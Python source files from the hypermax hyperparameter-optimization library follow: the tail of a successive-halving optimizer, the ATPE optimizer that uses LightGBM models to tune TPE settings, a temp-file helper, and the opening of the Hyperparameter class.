runsNeeded = sorted(runs, key=lambda run: run['budget'])
else:
maxLoop = max([result['$loop'] for result in finishedAndRunningResults])
for loopToTest in range(maxLoop+1):
loopResults = [result for result in finishedAndRunningResults if result['$loop'] == loopToTest]
# Define which secondary halving runs have enough data to operate
runsNeeded = []
for run in runs:
if run['input_round'] != -1:
inputResultsForRun = [result for result in loopResults if (result['$group'] == run['group'] and result['$round'] == run['input_round'] and ('loss' in result))]
if len(inputResultsForRun) < run['input_configs']:
continue
resultsForRun = [result for result in loopResults if (result['$group'] == run['group'] and result['$round'] == run['round'])]
if len(resultsForRun) < run['configs_start']:
runsNeeded.append(run)
runsNeeded = sorted(runsNeeded, key=lambda run: (-run['group'], -run['budget']))
if len(runsNeeded) > 0:
loop = loopToTest
break
if loop is None:
loop = maxLoop
if len(runsNeeded) == 0:
runsNeeded = sorted(runs, key=lambda run: run['budget'])
loop += 1
run = runsNeeded[0]
if run['input_round'] == -1:
resultsForReccomendation = [result for result in results if result['$budget'] == run['budget']]
if random.uniform(0, 1) < 0.3:
params = self.randomOptimizer.recommendNextParameters(hyperparameterSpace, resultsForReccomendation, currentTrials)
else:
params = self.baseOptimizer.recommendNextParameters(hyperparameterSpace, resultsForReccomendation, currentTrials)
params['$budget'] = run['budget']
params['$loop'] = loop
params['$group'] = run['group']
params['$round'] = run['round']
return params
else:
inputResultsForRun = [result for result in loopResults if (result['$group'] == run['group'] and result['$round'] == run['input_round'])]
inputResultsForRun = sorted(inputResultsForRun, key=lambda result: result['loss'])[0:run['configs_start']]
existingResultsForRun = [result for result in loopResults if (result['$group'] == run['group'] and result['$round'] == run['round'])]
inputCanonicalStrings = [self.createCanonicalStringFromResult(result, hyperparameterSpace) for result in inputResultsForRun]
existingCanonicalStrings = [self.createCanonicalStringFromResult(result, hyperparameterSpace) for result in existingResultsForRun]
neededCanonicalStrings = set(inputCanonicalStrings).difference(existingCanonicalStrings)
neededResults = [inputResultsForRun[inputCanonicalStrings.index(resultString)] for resultString in neededCanonicalStrings]
chosenResult = random.choice(neededResults)
params = space.convertToStructuredValues(chosenResult)
params['$budget'] = run['budget']
params['$loop'] = loop
params['$group'] = run['group']
params['$round'] = run['round']
return params
```
#### File: hypermax/algorithms/atpe_optimizer.py
```python
from .optimization_algorithm_base import OptimizationAlgorithmBase
import hyperopt
import functools
import random
import numpy
import numpy.random
import json
import pkg_resources
from hypermax.hyperparameter import Hyperparameter
import sklearn
import lightgbm
import scipy.stats
import math
from pprint import pprint
import copy
import hypermax.file_utils
class ATPEOptimizer(OptimizationAlgorithmBase):
atpeParameters = [
'gamma',
'nEICandidates',
'resultFilteringAgeMultiplier',
'resultFilteringLossRankMultiplier',
'resultFilteringMode',
'resultFilteringRandomProbability',
'secondaryCorrelationExponent',
'secondaryCorrelationMultiplier',
'secondaryCutoff',
'secondaryFixedProbability',
'secondaryLockingMode',
'secondaryProbabilityMode',
'secondaryTopLockingPercentile',
]
atpeParameterCascadeOrdering = [
'resultFilteringMode',
'secondaryProbabilityMode',
'secondaryLockingMode',
'resultFilteringAgeMultiplier',
'resultFilteringLossRankMultiplier',
'resultFilteringRandomProbability',
'secondaryTopLockingPercentile',
'secondaryCorrelationExponent',
'secondaryCorrelationMultiplier',
'secondaryFixedProbability',
'secondaryCutoff',
'gamma',
'nEICandidates'
]
atpeParameterValues = {
'resultFilteringMode': ['age', 'loss_rank', 'none', 'random'],
'secondaryLockingMode': ['random', 'top'],
'secondaryProbabilityMode': ['correlation', 'fixed']
}
atpeModelFeatureKeys = [
'all_correlation_best_percentile25_ratio',
'all_correlation_best_percentile50_ratio',
'all_correlation_best_percentile75_ratio',
'all_correlation_kurtosis',
'all_correlation_percentile5_percentile25_ratio',
'all_correlation_skew',
'all_correlation_stddev_best_ratio',
'all_correlation_stddev_median_ratio',
'all_loss_best_percentile25_ratio',
'all_loss_best_percentile50_ratio',
'all_loss_best_percentile75_ratio',
'all_loss_kurtosis',
'all_loss_percentile5_percentile25_ratio',
'all_loss_skew',
'all_loss_stddev_best_ratio',
'all_loss_stddev_median_ratio',
'log10_cardinality',
'recent_10_correlation_best_percentile25_ratio',
'recent_10_correlation_best_percentile50_ratio',
'recent_10_correlation_best_percentile75_ratio',
'recent_10_correlation_kurtosis',
'recent_10_correlation_percentile5_percentile25_ratio',
'recent_10_correlation_skew',
'recent_10_correlation_stddev_best_ratio',
'recent_10_correlation_stddev_median_ratio',
'recent_10_loss_best_percentile25_ratio',
'recent_10_loss_best_percentile50_ratio',
'recent_10_loss_best_percentile75_ratio',
'recent_10_loss_kurtosis',
'recent_10_loss_percentile5_percentile25_ratio',
'recent_10_loss_skew',
'recent_10_loss_stddev_best_ratio',
'recent_10_loss_stddev_median_ratio',
'recent_15%_correlation_best_percentile25_ratio',
'recent_15%_correlation_best_percentile50_ratio',
'recent_15%_correlation_best_percentile75_ratio',
'recent_15%_correlation_kurtosis',
'recent_15%_correlation_percentile5_percentile25_ratio',
'recent_15%_correlation_skew',
'recent_15%_correlation_stddev_best_ratio',
'recent_15%_correlation_stddev_median_ratio',
'recent_15%_loss_best_percentile25_ratio',
'recent_15%_loss_best_percentile50_ratio',
'recent_15%_loss_best_percentile75_ratio',
'recent_15%_loss_kurtosis',
'recent_15%_loss_percentile5_percentile25_ratio',
'recent_15%_loss_skew',
'recent_15%_loss_stddev_best_ratio',
'recent_15%_loss_stddev_median_ratio',
'recent_25_correlation_best_percentile25_ratio',
'recent_25_correlation_best_percentile50_ratio',
'recent_25_correlation_best_percentile75_ratio',
'recent_25_correlation_kurtosis',
'recent_25_correlation_percentile5_percentile25_ratio',
'recent_25_correlation_skew',
'recent_25_correlation_stddev_best_ratio',
'recent_25_correlation_stddev_median_ratio',
'recent_25_loss_best_percentile25_ratio',
'recent_25_loss_best_percentile50_ratio',
'recent_25_loss_best_percentile75_ratio',
'recent_25_loss_kurtosis',
'recent_25_loss_percentile5_percentile25_ratio',
'recent_25_loss_skew',
'recent_25_loss_stddev_best_ratio',
'recent_25_loss_stddev_median_ratio',
'top_10%_correlation_best_percentile25_ratio',
'top_10%_correlation_best_percentile50_ratio',
'top_10%_correlation_best_percentile75_ratio',
'top_10%_correlation_kurtosis',
'top_10%_correlation_percentile5_percentile25_ratio',
'top_10%_correlation_skew',
'top_10%_correlation_stddev_best_ratio',
'top_10%_correlation_stddev_median_ratio',
'top_10%_loss_best_percentile25_ratio',
'top_10%_loss_best_percentile50_ratio',
'top_10%_loss_best_percentile75_ratio',
'top_10%_loss_kurtosis',
'top_10%_loss_percentile5_percentile25_ratio',
'top_10%_loss_skew',
'top_10%_loss_stddev_best_ratio',
'top_10%_loss_stddev_median_ratio',
'top_20%_correlation_best_percentile25_ratio',
'top_20%_correlation_best_percentile50_ratio',
'top_20%_correlation_best_percentile75_ratio',
'top_20%_correlation_kurtosis',
'top_20%_correlation_percentile5_percentile25_ratio',
'top_20%_correlation_skew',
'top_20%_correlation_stddev_best_ratio',
'top_20%_correlation_stddev_median_ratio',
'top_20%_loss_best_percentile25_ratio',
'top_20%_loss_best_percentile50_ratio',
'top_20%_loss_best_percentile75_ratio',
'top_20%_loss_kurtosis',
'top_20%_loss_percentile5_percentile25_ratio',
'top_20%_loss_skew',
'top_20%_loss_stddev_best_ratio',
'top_20%_loss_stddev_median_ratio',
'top_30%_correlation_best_percentile25_ratio',
'top_30%_correlation_best_percentile50_ratio',
'top_30%_correlation_best_percentile75_ratio',
'top_30%_correlation_kurtosis',
'top_30%_correlation_percentile5_percentile25_ratio',
'top_30%_correlation_skew',
'top_30%_correlation_stddev_best_ratio',
'top_30%_correlation_stddev_median_ratio',
'top_30%_loss_best_percentile25_ratio',
'top_30%_loss_best_percentile50_ratio',
'top_30%_loss_best_percentile75_ratio',
'top_30%_loss_kurtosis',
'top_30%_loss_percentile5_percentile25_ratio',
'top_30%_loss_skew',
'top_30%_loss_stddev_best_ratio',
'top_30%_loss_stddev_median_ratio'
]
def __init__(self):
scalingModelData = json.loads(pkg_resources.resource_string(__name__, "../atpe_models/scaling_model.json"))
self.featureScalingModels = {}
for key in self.atpeModelFeatureKeys:
self.featureScalingModels[key] = sklearn.preprocessing.StandardScaler()
self.featureScalingModels[key].scale_ = numpy.array(scalingModelData[key]['scales'])
self.featureScalingModels[key].mean_ = numpy.array(scalingModelData[key]['means'])
self.featureScalingModels[key].var_ = numpy.array(scalingModelData[key]['variances'])
self.parameterModels = {}
self.parameterModelConfigurations = {}
for param in self.atpeParameters:
modelData = pkg_resources.resource_string(__name__, "../atpe_models/model-" + param + '.txt')
with hypermax.file_utils.ClosedNamedTempFile(modelData) as model_file_name:
self.parameterModels[param] = lightgbm.Booster(model_file=model_file_name)
configString = pkg_resources.resource_string(__name__, "../atpe_models/model-" + param + '-configuration.json')
data = json.loads(configString)
self.parameterModelConfigurations[param] = data
self.lastATPEParameters = None
self.lastLockedParameters = []
self.atpeParamDetails = None
def recommendNextParameters(self, hyperparameterSpace, results, currentTrials, lockedValues=None):
rstate = numpy.random.RandomState(seed=int(random.randint(1, 2 ** 32 - 1)))
params = {}
def sample(parameters):
nonlocal params
params = parameters
return {"loss": 0.5, 'status': 'ok'}
parameters = Hyperparameter(hyperparameterSpace).getFlatParameters()
if lockedValues is not None:
# Remove any locked values from ones the optimizer will examine
parameters = list(filter(lambda param: param.name not in lockedValues.keys(), parameters))
log10_cardinality = Hyperparameter(hyperparameterSpace).getLog10Cardinality()
initializationRounds = max(10, int(log10_cardinality))
atpeParams = {}
atpeParamDetails = {}
if len(list(result for result in results if result['loss'])) < initializationRounds:
atpeParams = {
'gamma': 1.0,
'nEICandidates': 24,
'resultFilteringAgeMultiplier': None,
'resultFilteringLossRankMultiplier': None,
'resultFilteringMode': "none",
'resultFilteringRandomProbability': None,
'secondaryCorrelationExponent': 1.0,
'secondaryCorrelationMultiplier': None,
'secondaryCutoff': 0,
'secondarySorting': 0,
'secondaryFixedProbability': 0.5,
'secondaryLockingMode': 'top',
'secondaryProbabilityMode': 'fixed',
'secondaryTopLockingPercentile': 0
}
else:
# Calculate the statistics for the distribution
stats = self.computeAllResultStatistics(hyperparameterSpace, results)
stats['num_parameters'] = len(parameters)
stats['log10_cardinality'] = Hyperparameter(hyperparameterSpace).getLog10Cardinality()
stats['log10_trial'] = math.log10(len(results))
baseVector = []
for feature in self.atpeModelFeatureKeys:
scalingModel = self.featureScalingModels[feature]
transformed = scalingModel.transform([[stats[feature]]])[0][0]
baseVector.append(transformed)
baseVector = numpy.array([baseVector])
for atpeParamIndex, atpeParameter in enumerate(self.atpeParameterCascadeOrdering):
vector = copy.copy(baseVector)[0].tolist()
atpeParamFeatures = self.atpeParameterCascadeOrdering[:atpeParamIndex]
for atpeParamFeature in atpeParamFeatures:
# We have to insert a special value of -3 for any conditional parameters.
if atpeParamFeature == 'resultFilteringAgeMultiplier' and atpeParams['resultFilteringMode'] != 'age':
vector.append(-3) # This is the default value inserted when parameters aren't relevant
elif atpeParamFeature == 'resultFilteringLossRankMultiplier' and atpeParams['resultFilteringMode'] != 'loss_rank':
vector.append(-3) # This is the default value inserted when parameters aren't relevant
elif atpeParamFeature == 'resultFilteringRandomProbability' and atpeParams['resultFilteringMode'] != 'random':
vector.append(-3) # This is the default value inserted when parameters aren't relevant
elif atpeParamFeature == 'secondaryCorrelationMultiplier' and atpeParams['secondaryProbabilityMode'] != 'correlation':
vector.append(-3) # This is the default value inserted when parameters aren't relevant
elif atpeParamFeature == 'secondaryFixedProbability' and atpeParams['secondaryProbabilityMode'] != 'fixed':
vector.append(-3) # This is the default value inserted when parameters aren't relevant
elif atpeParamFeature == 'secondaryTopLockingPercentile' and atpeParams['secondaryLockingMode'] != 'top':
vector.append(-3) # This is the default value inserted when parameters aren't relevant
elif atpeParamFeature in self.atpeParameterValues:
for value in self.atpeParameterValues[atpeParamFeature]:
vector.append(1.0 if atpeParams[atpeParamFeature] == value else 0)
else:
vector.append(float(atpeParams[atpeParamFeature]))
allFeatureKeysForATPEParamModel = copy.copy(self.atpeModelFeatureKeys)
for atpeParamFeature in atpeParamFeatures:
if atpeParamFeature in self.atpeParameterValues:
for value in self.atpeParameterValues[atpeParamFeature]:
allFeatureKeysForATPEParamModel.append(atpeParamFeature + "_" + value)
else:
allFeatureKeysForATPEParamModel.append(atpeParamFeature)
value = self.parameterModels[atpeParameter].predict([vector])[0]
featureContributions = self.parameterModels[atpeParameter].predict([vector], pred_contrib=True)[0]
atpeParamDetails[atpeParameter] = {
"value": None,
"reason": None
}
# Set the value
if atpeParameter in self.atpeParameterValues:
# Renormalize the predicted probabilities
config = self.parameterModelConfigurations[atpeParameter]
for atpeParamValueIndex, atpeParamValue in enumerate(self.atpeParameterValues[atpeParameter]):
value[atpeParamValueIndex] = (((value[atpeParamValueIndex] - config['predMeans'][atpeParamValue]) / config['predStddevs'][atpeParamValue]) *
config['origStddevs'][atpeParamValue]) + config['origMeans'][atpeParamValue]
value[atpeParamValueIndex] = max(0.0, min(1.0, value[atpeParamValueIndex]))
maxVal = numpy.max(value)
for atpeParamValueIndex, atpeParamValue in enumerate(self.atpeParameterValues[atpeParameter]):
value[atpeParamValueIndex] = max(value[atpeParamValueIndex], maxVal * 0.15) # We still allow the non reccomended modes to get chosen 15% of the time
# Make a random weighted choice based on the normalized probabilities
probabilities = value / numpy.sum(value)
chosen = numpy.random.choice(a=self.atpeParameterValues[atpeParameter], p=probabilities)
atpeParams[atpeParameter] = str(chosen)
else:
# Renormalize the predictions
config = self.parameterModelConfigurations[atpeParameter]
value = (((value - config['predMean']) / config['predStddev']) * config['origStddev']) + config['origMean']
atpeParams[atpeParameter] = float(value)
atpeParamDetails[atpeParameter]["reason"] = {}
# If we are predicting a class, we get separate feature contributions for each class. Take the average
if atpeParameter in self.atpeParameterValues:
featureContributions = numpy.mean(
numpy.reshape(featureContributions, newshape=(len(allFeatureKeysForATPEParamModel) + 1, len(self.atpeParameterValues[atpeParameter]))), axis=1)
contributions = [(self.atpeModelFeatureKeys[index], float(featureContributions[index])) for index in range(len(self.atpeModelFeatureKeys))]
contributions = sorted(contributions, key=lambda r: -r[1])
# Only focus on the top 10% of features, since it gives more useful information. Otherwise the total gets really squashed out over many features,
# because our model is highly regularized.
contributions = contributions[:int(len(contributions) / 10)]
total = numpy.sum([contrib[1] for contrib in contributions])
for contributionIndex, contribution in enumerate(contributions[:3]):
atpeParamDetails[atpeParameter]['reason'][contribution[0]] = str(int(float(contribution[1]) * 100.0 / total)) + "%"
# Apply bounds to all the parameters
if atpeParameter == 'gamma':
atpeParams['gamma'] = max(0.2, min(2.0, atpeParams['gamma']))
if atpeParameter == 'nEICandidates':
atpeParams['nEICandidates'] = int(max(2.0, min(48, atpeParams['nEICandidates'])))
if atpeParameter == 'resultFilteringAgeMultiplier':
atpeParams['resultFilteringAgeMultiplier'] = max(1.0, min(4.0, atpeParams['resultFilteringAgeMultiplier']))
if atpeParameter == 'resultFilteringLossRankMultiplier':
atpeParams['resultFilteringLossRankMultiplier'] = max(1.0, min(4.0, atpeParams['resultFilteringLossRankMultiplier']))
if atpeParameter == 'resultFilteringRandomProbability':
atpeParams['resultFilteringRandomProbability'] = max(0.7, min(0.9, atpeParams['resultFilteringRandomProbability']))
if atpeParameter == 'secondaryCorrelationExponent':
atpeParams['secondaryCorrelationExponent'] = max(1.0, min(3.0, atpeParams['secondaryCorrelationExponent']))
if atpeParameter == 'secondaryCorrelationMultiplier':
atpeParams['secondaryCorrelationMultiplier'] = max(0.2, min(1.8, atpeParams['secondaryCorrelationMultiplier']))
if atpeParameter == 'secondaryCutoff':
atpeParams['secondaryCutoff'] = max(-1.0, min(1.0, atpeParams['secondaryCutoff']))
if atpeParameter == 'secondaryFixedProbability':
atpeParams['secondaryFixedProbability'] = max(0.2, min(0.8, atpeParams['secondaryFixedProbability']))
if atpeParameter == 'secondaryTopLockingPercentile':
atpeParams['secondaryTopLockingPercentile'] = max(0, min(10.0, atpeParams['secondaryTopLockingPercentile']))
# Now blank out unneeded params so they don't confuse us
if atpeParams['secondaryLockingMode'] == 'random':
atpeParams['secondaryTopLockingPercentile'] = None
if atpeParams['secondaryProbabilityMode'] == 'fixed':
atpeParams['secondaryCorrelationMultiplier'] = None
else:
atpeParams['secondaryFixedProbability'] = None
if atpeParams['resultFilteringMode'] == 'none':
atpeParams['resultFilteringAgeMultiplier'] = None
atpeParams['resultFilteringLossRankMultiplier'] = None
atpeParams['resultFilteringRandomProbability'] = None
elif atpeParams['resultFilteringMode'] == 'age':
atpeParams['resultFilteringLossRankMultiplier'] = None
atpeParams['resultFilteringRandomProbability'] = None
elif atpeParams['resultFilteringMode'] == 'loss_rank':
atpeParams['resultFilteringAgeMultiplier'] = None
atpeParams['resultFilteringRandomProbability'] = None
elif atpeParams['resultFilteringMode'] == 'random':
atpeParams['resultFilteringAgeMultiplier'] = None
atpeParams['resultFilteringLossRankMultiplier'] = None
for atpeParameter in self.atpeParameters:
if atpeParams[atpeParameter] is None:
del atpeParamDetails[atpeParameter]
else:
atpeParamDetails[atpeParameter]['value'] = atpeParams[atpeParameter]
self.lastATPEParameters = atpeParams
self.atpeParamDetails = atpeParamDetails
# pprint(atpeParams)
def computePrimarySecondary():
if len(results) < initializationRounds:
return parameters, [], [0.5] * len(parameters) # Put all parameters as primary
if len(set(result['loss'] for result in results)) < 5:
return parameters, [], [0.5] * len(parameters) # Put all parameters as primary
numberParameters = [parameter for parameter in parameters if parameter.config['type'] == 'number']
otherParameters = [parameter for parameter in parameters if parameter.config['type'] != 'number']
totalWeight = 0
correlations = {}
for parameter in numberParameters:
if len(set(result[parameter.name] for result in results if result[parameter.name] is not None)) < 2:
correlations[parameter.name] = 0
else:
values = []
valueLosses = []
for result in results:
if result[parameter.name] is not None and result['loss'] is not None:
values.append(result[parameter.name])
valueLosses.append(result['loss'])
correlation = math.pow(abs(scipy.stats.spearmanr(values, valueLosses)[0]), atpeParams['secondaryCorrelationExponent'])
correlations[parameter.name] = correlation
totalWeight += correlation
threshold = totalWeight * abs(atpeParams['secondaryCutoff'])
if atpeParams['secondaryCutoff'] < 0:
# Reverse order - we lock in the highest correlated parameters
sortedParameters = sorted(numberParameters, key=lambda parameter: correlations[parameter.name])
else:
# Normal order - sort properties by their correlation to lock in lowest correlated parameters
sortedParameters = sorted(numberParameters, key=lambda parameter: -correlations[parameter.name])
primaryParameters = []
secondaryParameters = []
cumulative = totalWeight
for parameter in sortedParameters:
if cumulative < threshold:
secondaryParameters.append(parameter)
else:
primaryParameters.append(parameter)
cumulative -= correlations[parameter.name]
return primaryParameters + otherParameters, secondaryParameters, correlations
if len([result['loss'] for result in results if result['loss'] is not None]) == 0:
maxLoss = 1
else:
maxLoss = numpy.max([result['loss'] for result in results if result['loss'] is not None])
# We create a copy of lockedValues so we don't modify the object that was passed in as an argument - treat it as immutable.
# The ATPE algorithm will lock additional values in a stochastic manner
if lockedValues is None:
lockedValues = {}
else:
lockedValues = copy.copy(lockedValues)
filteredResults = []
removedResults = []
if len(results) > initializationRounds:
primaryParameters, secondaryParameters, correlations = computePrimarySecondary()
self.lastLockedParameters = []
sortedResults = list(sorted(list(results), key=lambda result: (result['loss'] if result['loss'] is not None else (maxLoss + 1))))
topResults = sortedResults
if atpeParams['secondaryLockingMode'] == 'top':
topResultsN = max(1, int(math.ceil(len(sortedResults) * atpeParams['secondaryTopLockingPercentile'] / 100.0)))
topResults = sortedResults[:topResultsN]
# Any secondary parameters have may be locked to either the current best value or any value within the result pool.
for secondary in secondaryParameters:
if atpeParams['secondaryProbabilityMode'] == 'fixed':
if random.uniform(0, 1) < atpeParams['secondaryFixedProbability']:
self.lastLockedParameters.append(secondary.name)
if atpeParams['secondaryLockingMode'] == 'top':
lockResult = random.choice(topResults)
if lockResult[secondary.name] is not None and lockResult[secondary.name] != "":
lockedValues[secondary.name] = lockResult[secondary.name]
elif atpeParams['secondaryLockingMode'] == 'random':
lockedValues[secondary.name] = self.chooseRandomValueForParameter(secondary)
elif atpeParams['secondaryProbabilityMode'] == 'correlation':
probability = max(0, min(1, abs(correlations[secondary.name]) * atpeParams['secondaryCorrelationMultiplier']))
if random.uniform(0, 1) < probability:
self.lastLockedParameters.append(secondary.name)
if atpeParams['secondaryLockingMode'] == 'top':
lockResult = random.choice(topResults)
if lockResult[secondary.name] is not None and lockResult[secondary.name] != "":
lockedValues[secondary.name] = lockResult[secondary.name]
elif atpeParams['secondaryLockingMode'] == 'random':
lockedValues[secondary.name] = self.chooseRandomValueForParameter(secondary)
# Now last step, we filter results prior to sending them into ATPE
for resultIndex, result in enumerate(results):
if atpeParams['resultFilteringMode'] == 'none':
filteredResults.append(result)
elif atpeParams['resultFilteringMode'] == 'random':
if random.uniform(0, 1) < atpeParams['resultFilteringRandomProbability']:
filteredResults.append(result)
else:
removedResults.append(result)
elif atpeParams['resultFilteringMode'] == 'age':
age = float(resultIndex) / float(len(results))
if random.uniform(0, 1) < (atpeParams['resultFilteringAgeMultiplier'] * age):
filteredResults.append(result)
else:
removedResults.append(result)
elif atpeParams['resultFilteringMode'] == 'loss_rank':
rank = 1.0 - (float(sortedResults.index(result)) / float(len(results)))
if random.uniform(0, 1) < (atpeParams['resultFilteringLossRankMultiplier'] * rank):
filteredResults.append(result)
else:
removedResults.append(result)
# If we are in initialization, or by some other fluke of random nature that we end up with no results after filtering,
# then just use all the results
if len(filteredResults) == 0:
filteredResults = results
hyperopt.fmin(fn=sample,
space=Hyperparameter(hyperparameterSpace).createHyperoptSpace(lockedValues),
algo=functools.partial(hyperopt.tpe.suggest, n_startup_jobs=initializationRounds, gamma=atpeParams['gamma'],
n_EI_candidates=int(atpeParams['nEICandidates'])),
max_evals=1,
trials=self.convertResultsToTrials(hyperparameterSpace, filteredResults),
rstate=rstate,
show_progressbar=False)
return params
def chooseRandomValueForParameter(self, parameter):
if parameter.config.get('mode', 'uniform') == 'uniform':
minVal = parameter.config['min']
maxVal = parameter.config['max']
if parameter.config.get('scaling', 'linear') == 'logarithmic':
minVal = math.log(minVal)
maxVal = math.log(maxVal)
value = random.uniform(minVal, maxVal)
if parameter.config.get('scaling', 'linear') == 'logarithmic':
value = math.exp(value)
if 'rounding' in parameter.config:
value = round(value / parameter.config['rounding']) * parameter.config['rounding']
elif parameter.get('mode', 'uniform') == 'normal':
meanVal = parameter.config['mean']
stddevVal = parameter.config['stddev']
if parameter.config.get('scaling', 'linear') == 'logarithmic':
meanVal = math.log(meanVal)
stddevVal = math.log(stddevVal)
value = random.gauss(meanVal, stddevVal)
if parameter.config.get('scaling', 'linear') == 'logarithmic':
value = math.exp(value)
if 'rounding' in parameter.config:
value = round(value / parameter.config['rounding']) * parameter.config['rounding']
elif parameter.get('mode', 'uniform') == 'randint':
max = parameter.config['max']
value = random.randint(0, max-1)
return value
def computePartialResultStatistics(self, hyperparameterSpace, results):
losses = numpy.array(sorted([result['loss'] for result in results if result['loss'] is not None]))
bestLoss = 0
percentile5Loss = 0
percentile25Loss = 0
percentile50Loss = 0
percentile75Loss = 0
statistics = {}
numpy.warnings.filterwarnings('ignore')
if len(set(losses)) > 1:
bestLoss = numpy.percentile(losses, 0)
percentile5Loss = numpy.percentile(losses, 5)
percentile25Loss = numpy.percentile(losses, 25)
percentile50Loss = numpy.percentile(losses, 50)
percentile75Loss = numpy.percentile(losses, 75)
statistics['loss_skew'] = scipy.stats.skew(losses)
statistics['loss_kurtosis'] = scipy.stats.kurtosis(losses)
else:
statistics['loss_skew'] = 0
statistics['loss_kurtosis'] = 0
if percentile50Loss == 0:
statistics['loss_stddev_median_ratio'] = 0
statistics['loss_best_percentile50_ratio'] = 0
else:
statistics['loss_stddev_median_ratio'] = numpy.std(losses) / percentile50Loss
statistics['loss_best_percentile50_ratio'] = bestLoss / percentile50Loss
if bestLoss == 0:
statistics['loss_stddev_best_ratio'] = 0
else:
statistics['loss_stddev_best_ratio'] = numpy.std(losses) / bestLoss
if percentile25Loss == 0:
statistics['loss_best_percentile25_ratio'] = 0
statistics['loss_percentile5_percentile25_ratio'] = 0
else:
statistics['loss_best_percentile25_ratio'] = bestLoss / percentile25Loss
statistics['loss_percentile5_percentile25_ratio'] = percentile5Loss / percentile25Loss
if percentile75Loss == 0:
statistics['loss_best_percentile75_ratio'] = 0
else:
statistics['loss_best_percentile75_ratio'] = bestLoss / percentile75Loss
def getValue(result, parameter):
return result[parameter.name]
# Now we compute correlations between each parameter and the loss
parameters = Hyperparameter(hyperparameterSpace).getFlatParameters()
correlations = []
for parameter in parameters:
if parameter.config['type'] == 'number':
if len(set(getValue(result, parameter) for result in results if (getValue(result, parameter) is not None and result['loss'] is not None))) < 2:
correlations.append(0)
else:
values = []
valueLosses = []
for result in results:
if result['loss'] is not None and (isinstance(getValue(result, parameter), float) or isinstance(getValue(result, parameter), int)):
values.append(getValue(result, parameter))
valueLosses.append(result['loss'])
correlation = abs(scipy.stats.spearmanr(values, valueLosses)[0])
if math.isnan(correlation) or math.isinf(correlation):
correlations.append(0)
else:
correlations.append(correlation)
correlations = numpy.array(correlations)
if len(set(correlations)) == 1:
statistics['correlation_skew'] = 0
statistics['correlation_kurtosis'] = 0
statistics['correlation_stddev_median_ratio'] = 0
statistics['correlation_stddev_best_ratio'] = 0
statistics['correlation_best_percentile25_ratio'] = 0
statistics['correlation_best_percentile50_ratio'] = 0
statistics['correlation_best_percentile75_ratio'] = 0
statistics['correlation_percentile5_percentile25_ratio'] = 0
else:
bestCorrelation = numpy.percentile(correlations, 100) # Correlations are in the opposite order of losses, higher correlation is considered "best"
percentile5Correlation = numpy.percentile(correlations, 95)
percentile25Correlation = numpy.percentile(correlations, 75)
percentile50Correlation = numpy.percentile(correlations, 50)
percentile75Correlation = numpy.percentile(correlations, 25)
statistics['correlation_skew'] = scipy.stats.skew(correlations)
statistics['correlation_kurtosis'] = scipy.stats.kurtosis(correlations)
if percentile50Correlation == 0:
statistics['correlation_stddev_median_ratio'] = 0
statistics['correlation_best_percentile50_ratio'] = 0
else:
statistics['correlation_stddev_median_ratio'] = numpy.std(correlations) / percentile50Correlation
statistics['correlation_best_percentile50_ratio'] = bestCorrelation / percentile50Correlation
if bestCorrelation == 0:
statistics['correlation_stddev_best_ratio'] = 0
else:
statistics['correlation_stddev_best_ratio'] = numpy.std(correlations) / bestCorrelation
if percentile25Correlation == 0:
statistics['correlation_best_percentile25_ratio'] = 0
statistics['correlation_percentile5_percentile25_ratio'] = 0
else:
statistics['correlation_best_percentile25_ratio'] = bestCorrelation / percentile25Correlation
statistics['correlation_percentile5_percentile25_ratio'] = percentile5Correlation / percentile25Correlation
if percentile75Correlation == 0:
statistics['correlation_best_percentile75_ratio'] = 0
else:
statistics['correlation_best_percentile75_ratio'] = bestCorrelation / percentile75Correlation
return statistics
def computeAllResultStatistics(self, hyperparameterSpace, results):
losses = numpy.array(sorted([result['loss'] for result in results if result['loss'] is not None]))
if len(set(losses)) > 1:
percentile10Loss = numpy.percentile(losses, 10)
percentile20Loss = numpy.percentile(losses, 20)
percentile30Loss = numpy.percentile(losses, 30)
else:
percentile10Loss = losses[0]
percentile20Loss = losses[0]
percentile30Loss = losses[0]
allResults = list(results)
percentile10Results = [result for result in results if result['loss'] is not None and result['loss'] <= percentile10Loss]
percentile20Results = [result for result in results if result['loss'] is not None and result['loss'] <= percentile20Loss]
percentile30Results = [result for result in results if result['loss'] is not None and result['loss'] <= percentile30Loss]
recent10Count = min(len(results), 10)
recent10Results = results[-recent10Count:]
recent25Count = min(len(results), 25)
recent25Results = results[-recent25Count:]
recent15PercentCount = max(math.ceil(len(results) * 0.15), 5)
recent15PercentResults = results[-recent15PercentCount:]
statistics = {}
allResultStatistics = self.computePartialResultStatistics(hyperparameterSpace, allResults)
for stat, value in allResultStatistics.items():
statistics['all_' + stat] = value
percentile10Statistics = self.computePartialResultStatistics(hyperparameterSpace, percentile10Results)
for stat, value in percentile10Statistics.items():
statistics['top_10%_' + stat] = value
percentile20Statistics = self.computePartialResultStatistics(hyperparameterSpace, percentile20Results)
for stat, value in percentile20Statistics.items():
statistics['top_20%_' + stat] = value
percentile30Statistics = self.computePartialResultStatistics(hyperparameterSpace, percentile30Results)
for stat, value in percentile30Statistics.items():
statistics['top_30%_' + stat] = value
recent10Statistics = self.computePartialResultStatistics(hyperparameterSpace, recent10Results)
for stat, value in recent10Statistics.items():
statistics['recent_10_' + stat] = value
recent25Statistics = self.computePartialResultStatistics(hyperparameterSpace, recent25Results)
for stat, value in recent25Statistics.items():
statistics['recent_25_' + stat] = value
recent15PercentResult = self.computePartialResultStatistics(hyperparameterSpace, recent15PercentResults)
for stat, value in recent15PercentResult.items():
statistics['recent_15%_' + stat] = value
# Although we have added lots of protection in the computePartialResultStatistics code, one last hedge against any NaN or infinity values coming up
# in our statistics
for key in statistics.keys():
if math.isnan(statistics[key]) or math.isinf(statistics[key]):
statistics[key] = 0
return statistics
```
#### File: hypermax/hypermax/file_utils.py
```python
from contextlib import contextmanager
import tempfile
import os
# Windows doesn't support opening a NamedTemporaryFile.
# Solution inspired in https://stackoverflow.com/a/46501017/147507
@contextmanager
def ClosedNamedTempFile(contents):
try:
with tempfile.NamedTemporaryFile(delete=False) as f:
file_name = f.name
f.write(contents)
yield file_name
finally:
os.unlink(file_name)
```
#### File: hypermax/hypermax/hyperparameter.py
```python
from hyperopt import hp
import math
from pprint import pprint
import re
class Hyperparameter:
""" This class represents a hyperparameter."""
def __init__(self, config, parent=None, root='root'):
self.config = config
self.root = root
self.name = root[5:]
self.parent = parent
self.resultVariableName = re.sub("\\.\\d+\\.", ".", self.name)
self.hyperoptVariableName = self.root
if 'name' in config:
self.hyperoptVariableName = config['name']
def createHyperoptSpace(self, lockedValues=None):
name = self.root
if lockedValues is None:
lockedValues = {}
